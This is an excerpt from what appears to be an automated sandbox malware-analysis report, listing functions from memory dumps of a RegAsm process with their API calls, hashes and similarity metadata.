                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4469277001.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_6e60000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: 0b799ccdb55902e29e61ef9529cddfd38fa05037e7f54cd71d0841a95724ed3c
                                                                        • Instruction ID: c8f2c8d1abdec86e4a169054104845433d51f8a50ddc74cde06ca32ee50cf946
                                                                        • Opcode Fuzzy Hash: 0b799ccdb55902e29e61ef9529cddfd38fa05037e7f54cd71d0841a95724ed3c
                                                                        • Instruction Fuzzy Hash: 17111FB2C007498BDB10DF9AC844ADEFBF4EB89614F20842AE558B7200C378A545CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160EC89 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0160ECE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: c5bae7d0d38953554a9e7e8fc7b6417af1725ec0ccfc58c96d20a60aaf5150ec
                                                                        • Instruction ID: 07ea76dd8e6f8f688cf2b9b6f9c8adfb3da1cb665d6be58cc9306e0d23f14f0b
                                                                        • Opcode Fuzzy Hash: c5bae7d0d38953554a9e7e8fc7b6417af1725ec0ccfc58c96d20a60aaf5150ec
                                                                        • Instruction Fuzzy Hash: F11133B18002488FDB20DF9AD944BDEFFF8EB49324F20881AD558A3300C379A944CBA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160E3C0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,3006D315), ref: 0160E427
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: ba2f401ea95a2e7c387073f1097b61f28874e85ed49b90a10d24b999ca6f7896
                                                                        • Instruction ID: 29566326204b2d6d015c6b8d855c2b399cd0c08d35f83313fc4d9ff08cae7078
                                                                        • Opcode Fuzzy Hash: ba2f401ea95a2e7c387073f1097b61f28874e85ed49b90a10d24b999ca6f7896
                                                                        • Instruction Fuzzy Hash: E211F2B58002598FDB10DF9AD844BDEFBF8EB49324F20885AD558A3240C779A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160E71C Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleInitialize.OLE32(00000000), ref: 0160ECE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: f7c4ea12099cd605ff6ce468e8b31bcbc81db62444ab8dcf11d88b54711bfe8b
                                                                        • Instruction ID: d852b6812ac5cafb4b8a756ef2e2c19ed45852e23503377f5f0e8c3347e4ba59
                                                                        • Opcode Fuzzy Hash: f7c4ea12099cd605ff6ce468e8b31bcbc81db62444ab8dcf11d88b54711bfe8b
                                                                        • Instruction Fuzzy Hash: 5C1133B18007488FDB20DF9AC948B9EBBF8EB48324F10881AD518A3300C379A944CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0160E3C8 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,?,?,?,?,?,?,3006D315), ref: 0160E427
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4465181225.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_1600000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: bd13046ad5e565b4f105ccf37a0310f469e4bbbd7f651ca8c40bd88f492d8392
                                                                        • Instruction ID: 54528c9895f08cb7346be4acce78121b29225f15acccdf2983db00f706a6c0d2
                                                                        • Opcode Fuzzy Hash: bd13046ad5e565b4f105ccf37a0310f469e4bbbd7f651ca8c40bd88f492d8392
                                                                        • Instruction Fuzzy Hash: E31112B18002488FDB10DF9AD844BDEFBF8EB49324F20881AD518A3340C779A944CFA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014CD030 Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4464819423.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_14cd000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b1170b061e58305b12ae96ade86efce43ac4ab93b3d2fccef4fc74baba0057f4
                                                                        • Instruction ID: b771bd8cf2c1a196bf104160041028234e86ddd303fb44a192218241de325751
                                                                        • Opcode Fuzzy Hash: b1170b061e58305b12ae96ade86efce43ac4ab93b3d2fccef4fc74baba0057f4
                                                                        • Instruction Fuzzy Hash: E92145B8904200DFCB55DF58C9C0B22BB64EB84718F20C57ED8090B362C33AD407CAA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 014CD006 Relevance: .1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.4464819423.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_14cd000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54f7a12d76734a3bcbe0394983a6f82300feb4c8c6d29d2cfc5a0dc2ebd507d9
                                                                        • Instruction ID: b2ce34d7e66e6161f6ad562ee082116fc93a5152ea9260dbb9c9537729c03c55
                                                                        • Opcode Fuzzy Hash: 54f7a12d76734a3bcbe0394983a6f82300feb4c8c6d29d2cfc5a0dc2ebd507d9
                                                                        • Instruction Fuzzy Hash: FB216D755093C08FDB13CF64C990711BF71AB46214F29C5EBC8898F6A7C23A980ACB62
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%